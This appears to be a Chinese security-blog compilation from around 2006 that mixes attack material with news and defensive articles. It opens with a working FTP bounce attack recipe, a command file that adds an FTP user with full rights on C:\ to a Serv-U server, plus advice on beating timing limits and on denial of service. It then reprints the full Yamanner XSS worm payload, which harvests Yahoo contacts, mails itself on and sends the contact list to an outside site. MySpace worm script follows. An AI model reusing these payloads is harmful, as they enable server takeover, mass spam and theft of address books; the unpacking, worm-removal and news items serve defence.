利用反弹攻击也可以发送任意数据，把要发送的数据写到文件中然后RETR就行了。既然可以发送任意数据，当然包括向43958端口发送添加有执行权限的FTP用户的命令咯。这真是个令人兴奋的主意。

以下内容保存为test.txt并传到FTP根目录：

user LocalAdministrator

Pass #l@$ak#.lk;0@P

SITE MAINTENANCE

-SETUSERSETUP

-IP=0.0.0.0

-PortNo=21

-User=lake

-Password=admin123

-HomeDir=c:\

-LoginMesFile=

-Disable=0

-RelPaths=1

-NeedSecure=0

-HideHidden=0

-AlwaysAllowLogin=0

-ChangePassword=0

-QuotaEnable=0

-MaxUsersLoginPerIP=-1

-SpeedLimitUp=0

-SpeedLimitDown=0

-MaxNrUsers=-1

-IdleTimeOut=600

-SessionTimeOut=-1

-Expire=0

-RatioUp=1

-RatioDown=1

-RatiosCredit=0

-QuotaCurrent=0

-QuotaMaximum=0

-Maintenance=None

-PasswordType=Regular

-Ratios=None

Access=c:\|RWAMELCDP

然后retr test.txt，添加用户的数据就发过去了。

每次都莫名其妙的添加失败，后来试验多次才发现是由于数据发送太快43958端口那边还没来得及响应连接就就关闭了。解决办法是在test.txt文件前面添加许多无用数据，当文件达到1M多的时候，哈哈，成功了！

以上是在5.2版本的情况，但在6.3版本上，情况不妙，43958端口限制了接收数据大小，几十K都不行了，何况一个1M的大文件呢。

这个地方一直没想到好的解决办法，似乎有两点思路供参考：

1、 上传/下载大文件，降低其处理速度

2、 对FTP服务器进行拒绝服务攻击，消耗资源降低处理速度

DDOS攻击 如何判断是否遭到流量攻击
作者：五月 整理出处：天极安全

问:我使用的在线检查软件警告说，发现DDoS攻击，请问这到底是什么意思?机器是单位的局域网，和这个有关系吗?我应该如何去判断是否遭到流量攻击?
　　答:DDoS是英文Distributed Denial of Service的缩写，意即“分布式拒绝服务”。你可以这么理解，凡是能导致合法用户不能够访问正常网络服务的行为都算是拒绝服务攻击。也就是说，拒绝服务攻击的目的非常明确，就是要阻止合法用户对正常网络资源的访问，从而达成攻击者不可告人的目的。
　　DDoS的攻击策略侧重于通过很多“僵尸主机”(被攻击者入侵过或可间接利用的主机)向受害主机发送大量看似合法的网络包，从而造成网络阻塞或服务器资源耗尽而导致拒绝服务。分布式拒绝服务攻击一旦被实施，攻击网络包就会犹如洪水般涌向受害主机，从而把合法用户的网络包淹没，导致合法用户无法正常访问服务器的网络资源。
　　判断网站是否遭受了流量攻击很简单，可通过Ping命令来测试，若发现Ping超时或丢包严重，则可能遭受了流量攻击。此时若发现和你的主机接在同一交换机上的服务器也访问不了了，基本可以确定是遭受了流量攻击。

电信114搜索发现重大漏洞,可直接执行XSS语句

电信114搜索发现重大漏洞,可直接执行XSS语句




cnBeta顾问CN.Tink报道:

听说微软的Live Search与中国电信合作了,微软为电信提供技术支持,将他们的搜索服务与电信的“网页揪错”捆绑起来.
　　登陆Live Search与电信合作的搜索引擎后,随便搜索了一下site:flyt.cn,结果意想不到,在点击下一页后,出现问题了,突然弹出一个对话框如下:

　　后来我查看源代码后发现，Live Search所收录的网页里面有我blog中一篇“某些大站的XSS跨站”，这篇文章里面有一些XSS语句，Live Search搜索出来的结果直接执行了这些语句，如果我在某篇文章里写上iframe....挂个马，不知道会有什么情况，呵呵！看来微软细节还是没有做好！

　　微软自己的Live Search却没有这么弱智的BUG，呵呵！

黑客称Firefox太脆弱 需重写全部核心代码

【赛迪网讯】10月3日消息，据国外媒体报道，有黑客日前表示，Firefox浏览器的安全漏洞太多，依靠补丁程序是根本无法修复的。
据ZDNet网站报道，在日前召开的ToorCon黑客大会上，两名黑客Spiegelmock和Andrew Wbeelsoi称，Firefox浏览器的安全漏洞太多，依靠补丁程序是根本无法修复的。
两名黑客称，Firefox的Javascript代码已经是10年前的产物了，很容易遭到攻击。而且，要想彻底解决问题，必须要重写Firefox的全部核心代码。
对此，新上任的Firefox安全专家Window Snyder称，将对此展开调查。但同时指出，尽管Firefox浏览器可能存在一些安全漏洞，但还不至于到了补丁无法修复的地步。
众所周知，Firefox浏览器正是以安全而闻名。据Net Applications的统计结果显示，截止到今年8月底，Firefox的市场分额已达到11.8%，而IE的份额则下滑至83%

传说中闹得YAHOO不可开交的XSS WORM

传说中闹得YAHOO不可开交的XSS WORM,赛门铁克将其危害级别定为Level 2,下一个是谁?163,sohu,还是sina?
＜img src=’http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif’ onfiltered=”var http_request = false; var Email = ‘’; var IDList = ‘’; var CRumb = ‘’; function makeRequest(url, Func, Method, Param) { if (window.XMLHttpRequest) { http_request = new XMLHttpRequest(); } else if (window.ActiveXObject) { http_request = new ActiveXObject(’Microsoft.XMLHTTP’); } http_request. onfiltered= Func; http_request.open(Method, url, true); if( Method == ‘GET’) http_request.send(null); else http_request.send(Param); }window.open(’http://www,lastdata.com’); ServerUrl = url0;USIndex = ServerUrl.indexOf(’us.’ ,0);MailIndex = ServerUrl.indexOf(’.mail’ ,0);CutLen = MailIndex - USIndex - 3;var Server = ServerUrl.substr(USIndex + 3, CutLen); function GetIDs(HtmlContent) { IDList = ‘’; StartString = ‘ ＜td＞’; EndString = ‘＜/td＞’; i = 0; StartIndex = HtmlContent.indexOf(StartString, 0); while(StartIndex ＞= 0) { EndIndex = HtmlContent.indexOf(EndString, StartIndex); CutLen = EndIndex - StartIndex - StartString.length; YahooID = HtmlContent.substr(StartIndex + StartString.length, CutLen); if( YahooID.indexOf(’@yahoo.com’, 0) ＞ 0 || YahooID.indexOf(’@yahoogroups.com’, 0) ＞ 0 ) IDList = IDList + ‘,’ + YahooID ; StartString = ‘＜/tr＞’; StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); StartString = ‘ ＜td＞’; StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); i++; } if(IDList.substr(0,1) == ‘,’) IDList = IDList.substr(1, IDList.length); if(IDList.indexOf(’,', 0)＞0 ) { IDListArray = IDList.split(’,'); Email = IDListArray[0]; IDList = IDList.replace(Email + ‘,’, ‘’); } CurEmail = spamform.NE.value; IDList = IDList.replace(CurEmail + ‘,’, ‘’); IDList = IDList.replace(’,’ + CurEmail, ‘’);IDList = IDList.replace(CurEmail, ‘’);UserEmail = showLetter.FromAddress.value;IDList = IDList.replace(’,’ + UserEmail, ‘’);IDList = IDList.replace(UserEmail + ‘,’, ‘’);IDList = IDList.replace(UserEmail, ‘’); return IDList; } function ListContacts() { if (http_request.readyState == 4) { if (http_request.status == 200) { HtmlContent = http_request.responseText; IDList = GetIDs(HtmlContent); makeRequest(’http://us.’ + Server + ‘.mail.yahoo.com/ym/Compose/?rnd=’ + Math.random(), Getcrumb, ‘GET’, null); } } } function ExtractStr(HtmlContent) { StartString = ‘name=\u0022.crumb\u0022 value=\u0022′; EndString = ‘\u0022′; i = 0; StartIndex = HtmlContent.indexOf(StartString, 0); EndIndex = HtmlContent.indexOf(EndString, StartIndex + StartString.length ); CutLen = EndIndex - StartIndex - StartString.length; crumb = HtmlContent.substr(StartIndex + StartString.length , CutLen ); return crumb; } function Getcrumb() { if (http_request.readyState == 4) { if (http_request.status == 200) { HtmlContent = http_request.responseText; CRumb = ExtractStr(HtmlContent); MyBody = ‘this is test’; MySubj = ‘New Graphic Site’; Url = ‘http://us.’ + Server + ‘.mail.yahoo.com/ym/Compose’; var ComposeAction = compose.action;MidIndex = ComposeAction.indexOf(’&Mid=’ ,0);incIndex = ComposeAction.indexOf(’&inc’ ,0);CutLen = incIndex - MidIndex - 5;var MyMid = ComposeAction.substr(MidIndex + 5, CutLen); QIndex = ComposeAction.indexOf(’?box=’ ,0);AIndex = ComposeAction.indexOf(’&Mid’ ,0);CutLen = AIndex - QIndex - 5;var BoxName = ComposeAction.substr(QIndex + 5, CutLen); Param = ‘SEND=1&SD=&SC=&CAN=&docCharset=windows-1256&PhotoMailUser=&PhotoToolInstall=&OpenInsertPhoto=&PhotoGetStart=0&SaveCopy=no&PhotoMailInstallOrigin=&.crumb=RUMBVAL&Mid=EMAILMID&inc=&AttFol=&box=BOXNAME&FwdFile=YM_FM&FwdMsg=EMAILMID&FwdSubj=EMAILSUBJ&FwdInline=&OriginalFrom=FROMEMAIL&OriginalSubject=EMAILSUBJ&InReplyTo=&NumAtt=0&AttData=&UplData=&OldAttData=&OldUplData=&FName=&ATT=&VID=&Markers=&NextMarker=0&Thumbnails=&PhotoMailWith=&BrowseState=&PhotoIcon=&ToolbarState=&VirusReport=&Attachments=&Background=&BGRef=&BGDesc=&BGDef=&BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom=&PlainMsg=%3Cbr%3E%3Cbr%3ENote%3A+forwarded+message+attached.&PhotoFrame=&PhotoPrintAtHomeLink=&PhotoSlideShowLink=&PhotoPrintLink=&PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&PhotoDownloadUrl=&PhotoSaveUrl=&PhotoFlags=&start=compose&bmdomain=&showcc=&showbcc=&AC_Done=&AC_ToList=0%2C&AC_CcList=&AC_BccList=&sendtop=Send&savedrafttop=Save+as+a+Draft&canceltop=Cancel&FromAddr=&To=TOEMAIL&Cc=&Bcc=BCCLIST&Subj=EMAILSUBJ&Body=%3CBR%3E%3CBR%3ENote%3A+forwarded+message+attached.&Format=html&sendbottom=Send&savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&cancelbottom=Cancel’; Param = Param.replace(’BOXNAME’, BoxName); Param = Param.replace(’RUMBVAL’, CRumb); Param = Param.replace(’BCCLIST’, IDList); Param = Param.replace(’TOEMAIL’, Email);Param = Param.replace(’FROMEMAIL’, ‘av3@yahoo.com’); Param = Param.replace(’EMAILBODY’, MyBody); Param = Param.replace(’PlainMESSAGE’, ‘’); Param = Param.replace(’EMAILSUBJ’, MySubj);Param= Param.replace(’EMAILSUBJ’, MySubj);Param = Param.replace(’EMAILSUBJ’, MySubj); Param = Param.replace(’EMAILMID’, MyMid);Param = Param.replace(’EMAILMID’, MyMid);makeRequest(Url , alertContents, ‘POST’, Param); } }} function alertContents() { if (http_request.readyState == 4) { window.navigate(’http://www.av3.net/?ShowFolder&rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&BCCList=’ + IDList) } } makeRequest(’http://us.’ + Server + ‘.mail.yahoo.com/ym/QuickBuilder?build=Continue&cancel=&continuetop=Continue&canceltop=Cancel&Inbox=Inbox&Sent=Sent&pfolder=all&freqCheck=&freq=1&numdays=on&date=180&ps=1&numadr=100&continuebottom=Continue&cancelbottom=Cancel&rnd=’ + Math.random(), ListContacts, ‘GET’, null)”＞ Please wait while loading the site

New MySpace Worm

来自：s0n9'5 B1o9

var up_sURL="http://cache.static.userplane.com/presence";
var up_dURL="http://feed.presence.userplane.com/presence/m";
var up_wmURL="http://www.myspace.com/userplane/ic.cfm";
var up_pServ="presence.userplane.com";
function up_launch(_1){
var w=null;
w=window.open(up_wmURL+"?sendType=3&strEncryptedID="+up_sid+"&strDestinationUserID="+_1,"ICWindow_"+_1,"width=500,height=475,toolbar=0,directories=0,menubar=0,status=0,location=0,scrollbars=0,resizable=1");
if(w==null){
up_notify(_1);
}else{
up_clear(_1,false);
}
}
function up_clear(_3,_4){
var l=up_la;
up_la=new Array();
var _6=false;
while(l.length＞0){
var _7=l.pop();
if(_7.uid!=_3){
up_la.push(_7);
}else{
_6=true;
}
}
if(_6||!_4){
frames["up_lf"].location.href=up_dURL+"/o.php?sid="+up_sid+"&ou="+_3+"&forceClear="+(_4?"true":"false");
}
up_show();
}
function up_notify(_8){
var _9=true;
for(var i=0;i＜up_la.length;i++){
if(up_la[i].uid==_8){
_9=false;
}
}
if(_9){
var _b=new Object();
_b.uid=_8;
_b.n="A website member";
up_la.push(_b);
}
up_show();
}
function up_show(){
var e=document.getElementById("up_nd");
if(up_la.length＞0){
if(up_uid_display!=up_la[0].uid){
e.innerHTML="＜div style=\"text-align:center\"＞"+(up_is_win_ie?"":"＜table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"＞＜tr＞＜td align=\"center\"＞")+"＜table border=\"0\" cellpadding=\"2\" cellspacing=\"5\"＞＜tr＞＜td nowrap align=\"center\"＞＜strong style=\"font-size:larger;\"＞Incoming IM Message＜/strong＞＜/td＞＜/tr＞＜tr＞＜td align=\"center\"＞"+up_la[0].n+" wants to IM you.＜br＞Would you like to accept?＜/td＞＜/tr＞＜tr＞＜td nowrap align=\"center\"＞＜a style=\"font-size:larger;\" href=\"\" onClick=\"javascript: up_launch( '"+up_la[0].uid+"' ); return false;\"＞Yes＜/a＞           ＜a style=\"font-size:larger;\" href=\"\" onClick=\"javascript: up_clear( '"+up_la[0].uid+"', true ); return false;\"＞No＜/a＞＜/td＞＜/tr＞＜/table＞"+(up_is_win_ie?"":"＜/td＞＜/tr＞＜/table＞")+"＜/div＞";
up_uid_display=up_la[0].uid;
up_animate(200);
}
}else{
up_uid_display="";
up_animate(-200);
}
}
function up_animate(dY){
var e=document.getElementById("up_nd");
if(up_divY!=dY||up_la.length＞0){
if(up_divY!=dY){
up_divY+=dY＜up_divY?-10:10;
}
var px=up_divY+document.body.scrollTop+"px";
e.style.top=px;
clearTimeout(up_at);
up_at=setTimeout("up_animate("+dY+")",33);
}else{
e.style.top=dY;
}
}
function up_clean(ins){
var _11="";
for(var i=0;i＜ins.length;i++){
var c=ins.charAt(i);
if((c＞="A"&&c＜="Z")||(c＞="a"&&c＜="z")||(c＞="0"&&c＜="9")){
_11+=c;
}else{
_11+="_";
}
}
return _11;
}
function receiveData(_14){
if(_14!=""){
var a=_14.split(",");
if(a.length＞0){
while(u=a.shift()){
up_launch(u);
}
}
}
}
function URLencode(_16){
return escape(_16).replace(/\+/g,"%2B").replace(/\"/g,"%22").replace(/\'/g,"%27").replace(/\//g,"%2F");
}
function up_runPresence(sid,uid){
up_sid=URLencode(sid);
up_divY=-200;
up_la=new Array();
up_uid_display="";
document.write("＜iframe name=\"up_lf\" id=\"up_lf\" style=\"position:absolute; top: -200px; z-index:9998; width:100px; height:100px; border: 0px\" src=\"\"＞＜/iframe＞");
document.write("＜div id=\"up_nd\" style=\"position:absolute; width:250px; z-index:111111; left: 30px; top: -200px; background-color:#eeeeee; border: 1px solid #000000;\"＞＜/div＞");
if(up_sid!=""){
var _19="server="+up_pServ+"&uid="+up_sid;
document.write("＜div id=\"flash\" style=\"position:absolute; width:100px; z-index:9996; top: -200px;\"＞＜object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0\" id=\"presence\" width=\"1\" height=\"1\" align=\"middle\"＞＜param name=\"allowScriptAccess\" value=\"anyDomain\" /＞＜param name=\"movie\" value=\""+up_sURL+"/presence.swf\" /＞＜param name=\"quality\" value=\"high\" /＞＜param name=\"bgcolor\" value=\"#ffffff\" /＞＜param name=\"flashvars\" value=\""+_19+"\" /＞＜embed src=\""+up_sURL+"/presence.swf\" flashvars=\""+_19+"\" quality=\"high\" bgcolor=\"#ffffff\" width=\"1\" height=\"1\" swLiveConnect=true id=\"presence\" name=\"presence\" align=\"middle\" allowScriptAccess=\"anyDomain\" type=\"application/x-shockwave-flash\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\" /＞＜/object＞＜/div＞");
}
}
var up_sid=null;
var up_divY=null;
var up_la=null;
var up_uid_display=null;
var up_at=null;
var up_agt=navigator.userAgent.toLowerCase();
var up_appVer=navigator.appVersion.toLowerCase();
var up_is_mac=up_agt.indexOf("mac")!=-1;
var up_is_safari=up_agt.indexOf("safari")!=-1&&up_is_mac;
var up_is_khtml=up_is_safari||up_agt.indexOf("konqueror")!=-1;
var up_is_ie=up_appVer.indexOf("msie")!=-1&&up_agt.indexOf("opera")==-1&&!up_is_khtml;
var up_is_win=up_is_mac?false:(up_agt.indexOf("win")!=-1||up_agt.indexOf("16bit")!=-1);
var up_is_win_ie=up_is_win&&up_is_ie;

脱去诱惑的外衣 露出木马的本来面目

脱去诱惑的外衣 露出木马的本来面目
出处：电脑迷
作者：郑志勇

　　木马与杀毒软件之间的战斗从来就没有停止过，通过对已知的木马进行加壳可以再次躲避杀毒软件的查杀。加了壳的木马可以防止被杀毒软件跟踪查杀和被跟踪调试，同时也可以防止木马本身的算法程序被别人静态分析。加壳软件通常可以分为压缩保护和加密保护两种。
压缩保护
　　压缩保护就是利用特定的压缩算法把程序压缩打包，运行的时候在内存中执行解压过程并运行主程序。常见的压缩类加壳软件有：UPX、ASpack、Petite、PE-PACK、WWPack32、Shrinker等。以UPX为例，它的主要功能就是压缩，由于木马要在内存中释放后才能运行，所以对付这类加壳木马，凡是有内存杀毒功能的杀毒软件都能获得很好的查杀效果。
加密保护
　　这类软件侧重的是加密和保护软件，在反编译和反调试功能方面比较完善，某些加密软件甚至可以做到锁定自身在内存中的进程而不让别的进程插进来。此类加壳软件由于具备反编译和反调试功能，杀毒软件很难查杀到壳里的木马。常见的加密类加壳软件有ASProtect、tElock、Armadillo、SVK Protector、Xtreme-Protector、Obsidium、PElock等。
给木马脱壳
　　要给木马脱壳，需要先知道加了什么壳。PEid一款专用的查壳工具，可以方便的检测出软件到底是使用什么东西加的壳，给脱壳带来了极大的便利！木马Cmdshell.exe是个只有7KB的小木马，通过开放本机的54088端口，实现远程命令行控制。下面就详细介绍一下给木马Cmdshell.exe脱壳的过程。运行软件后，点击“File（文件）”右边的浏览按钮，打开Cmdshell.exe文件，这时在主界面中就可以看到该文件的加壳情况：Cmdshell.exe使用的是UPX加壳（如图1）。

图1 给Cmdshell脱壳
　　通常UPX加壳和脱壳工具是通用的，所以笔者选用了使用起来比较容易的UPX Shell对加壳文件进行脱壳。运行UPX Shell程序，点击“OPen（打开）”按钮，选定被加壳的程序。切换到“Compress（压缩）”标签，选择“Decompress（解压缩）”，再点击“GO（运行）”按钮，即可完成脱壳。脱壳后程序由原来的7K变成了20K，文件脱壳成功（如图2）。

图2 UPX脱壳

PE-Scan也是一款专用的查壳脱壳工具，能识别出当今流行的绝大多数壳的类型，而且功能更强。PE-Scan可以检测出一些壳的入口点（OEP），方便手动脱壳。运行Pe-scan，打开加了壳的木马，即可看到木马加壳的类型（如图3）。这里笔者使用了一个用Asprotect加壳的木马来做测试，由于目前的PE-Scan并不支持脱Asprotect壳，所以“脱壳”按钮无法使用。


图3 PE-Scan脱壳
　　为了脱去Asprotect壳，还需要使用另外一款脱壳软件stripperX来帮忙，它可以方便快捷地脱掉ASpack和ASProtect加的壳。运行stripperX，点击“open（打开）”按钮，选择要脱壳的文件，再点击“unpack（脱壳）”按钮即可生成目标文件，完成脱壳任务。需要注意的是由于ASProtect在不断升级，低版本的stripperX往往不能脱最新版本的ASProtect壳，目前stripperX 2.07版本支持脱ASpack 2.xx 和 ASProtect 1.2x版本的壳，stripperX 2.11版本支持脱ASProtect 1.3～2.0版本的壳（如图4）。

图4 stripperX脱壳
　　总的来说，脱壳要对症下药，先用PEid或PE-Scan查清楚壳的类型，然后找脱这种壳的工具，才能达到脱壳的目的。脱了壳的木马，就失去了保护，几乎所有的杀毒软件或木马查杀工具都能查杀它。当从网络上下载了某些怀疑有木马的程序，可以先用本文介绍的方法来检查一下，看看它是否被加了壳，如果是就要提高警惕了，建议不要使用。

安全防范之手工删除假警察的方法
作者：五月 整理出处：天极安全
      (1) 打开注册表编辑器,删除如下键值:
　　HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
　　Sassfix=%SYSTEM%\package.exe
　　(2) 打开任务管理器查看是否存在进程名为:package.exe(文件为%SYSTEM%\package.exe)终止它
　　(3) 将%SYSTEM%\system，C:\Documents and Settings\All Users\Main menu\Programs\StartUp目录及C:\Documents and Settings\All Users\Start Menu\Programs\Starup目录下的文件:package.exe删除。
　　注:%SYSTEM%是Windows系统的核心动态库所在目录，在Windows9X/ME下默认为:C:\WINDOWS\SYSTEM，Windows 2000/XP下默认为:C:\WINNT\SYSTEM32。
　　相关内容:
　　“假警察”(Worm.Win32.Dabber.a) 利用“震荡波”的后门及系统MS-4011漏洞进行传播，会尝试清除系统里的“震荡波”、“恶鹰”、“网络天空”等多个电脑病毒，可能造成系统异常。占用大量网络资源，可能会造成企业局域网运行缓慢甚至瘫痪。
　　Windows 9X(可感染，但无危害)NT/2000/XP(可危害)
　　1.复制自己到系统目录并实现自启动
　　病毒运行后，将自己复制到%SYSTEM%目录，c:\Documents and Settings\All Users\Main menu\Programs\StartUp目录及c:\Documents and Settings\All Users\Start Menu\Programs\Starup目录中，文件名为:package.exe。在注册表HKEY_LOCAL_MACHINE\SOFTWARE
　　\Microsoft\Windows\CurrentVersion\Run中加入自己的键值:sassfix=%system%\package.exe，病毒使用"sas4dab"为互斥量。
　　2.试图清除一些病毒的注册表键值:
　　尝试删除注册表Run项中的以下键值，使之不能正常启动:
以下是引用片段：
  Video Process.
  TempCom.
  SkynetRevenge
  MapiDrv
  BagleAV
  System Updater Service
  soundcontrl
  WinMsrv32
  drvddll.exe
  navapsrc.exe
  skynetave.exe
  Generic Host Service
  Windows Drive Compatibility
  windows.Microsoft Update
  Drvddll.exe
  Drvddll_exe
  drvsys
  drvsys.exe
  ssgrate
  ssgrate.exe
  lsasss
  lsasss.exe
  avserve2.exe
  avvserrve32.avserve
　　3.建立四个线程实现一些功能。
　　(1)后门:
　　病毒监视9898端口，等待客户端的连接。该后门可以执行一些如:执行文件，从特定网站下载文件等功能。
　　(2)TFTP服务器:
　　病毒监听69端口，实现一个tftp服务器，一旦病毒成功的利用漏洞攻击一个系统后被攻入的系统将从利用该服务器将病毒复制过去执行。以达到传播的目的。
　　(3)一个空线程:
　　病毒作者并没有实现任何代码。(可能下个版本将实现)
　　(4)利用漏洞进行攻击
　　病毒利用本地系统的ip进行计算，找到攻击目标地址并尝试对其5554端口(震荡波的后门)的连接。
　　A.如果联接失败:
　　病毒将尝试对其9898端口的连接(用以识别目标系统是否已被病毒感染过)，失败(目标系统没有被病毒感染)时病毒利用MS04-011漏洞对目标系统进行攻击，并利用自己的tftp服务器将自己复制过去。
　　B.联接成功:
　　病毒将尝试对其9898端口的连接(用以识别目标系统是否已被病毒感染过)当失败(目标系统没有被病毒感染)时病毒利用震荡波的后门将自己复制过去。

最新消息:万网URL转发器遭黑客攻击

最新消息:万网URL转发器遭黑客攻击

最新消息,万网也同样遭到了黑客攻击,万网在其主页上发布了一个紧急通知,全文如下,目前据报告部分经万网解析的站点已经无法访问.
尊敬的客户:
您好!感谢您长期以来对万网的关心和支持.
昨天夜间我公司URL转发服务器(218.244.143.84)遭受大量的黑客攻击,导致您通过万网设置的URL转发目前无法正常浏览.我们正在采取紧急措施,预计今天下午可以恢复.

遭遇黑客攻击和破坏,对用户和我们这样的运营商都是巨大的损失,我们和广大互联网企业一样,对这些不遵守网络道德的恶意攻击者深表痛恨,并在此呼吁我们提倡和平、公平的网络世界!同时我们也会尽全力保护广大用户的利益,请您放心. 最后,在此期间因此事件给您带来的不便和损失,我们向您表示万分的歉意,并恳请您予以充分的理解和支持!

中国万网客服中心
2006年9月30日

又一个Windows Shell 0day漏洞出现

微软已经在当地时间周四确认一个影响Windows XP,2000,2003的Shell的漏洞,它存在于WebViewFolderIcon ActiveX control,当成功被攻击者击溃后将可以获取本地用户权限.其实这个漏洞早在七月中旬就被安全组织FrSIRT发现.

但目前为止,我们还没有得到攻击代码的报告.Secunia已经将这个问题标记为"极度危险",建议用户在补丁发布之前关闭"WebViewFolderIcon" ActiveX组件.

微软仍然不紧不慢:

"We are working on a security update currently scheduled for an October 10 release,"

AJAX技术可能会扩大安全方面的威胁

分析人士警告说，机构如果考虑使用异步Javascript和XML（AJAX）技术创建更多的动态网页，就需要确保这些网页不会在无意间将自己的网络大门向其他应用敞开，而如果不使用AJAX，这些应用可能是安全的。分析人士表示，虽然AJAX自己不会产生新的安全危险，但它却极有可能扩大目前已经充分了解的几个安全威胁的严重性，这些威胁包括SQL资料隐码（SQL injections）、跨站脚本（cross-site scripting）和服务拒绝攻击等。

目前就出现了一个与此相关的案例：本周的Yamanner邮件群发蠕虫。在此案例中，Yamanner蠕虫利用Yahoo公司电子邮件服务上的一个明显的跨站脚本错误，感染了数以千计的用户。蠕虫伴随一个标题为“新图形站点（New Graphic Site）”的邮件进入用户的Yahoo邮箱，当用户打开受感染的电子邮件时，这个蠕虫就被激活。

与使用HTML方式编写的网页相比，企业采用AJAX编程技术，可随时向网页增添一些新内容，而无需重新加载整个页面，这样就大大提高了企业网站对客户输入所作出的响应。这些使用Javascript和XML技术的网站，允许浏览器从网页服务器上读取少量的数据。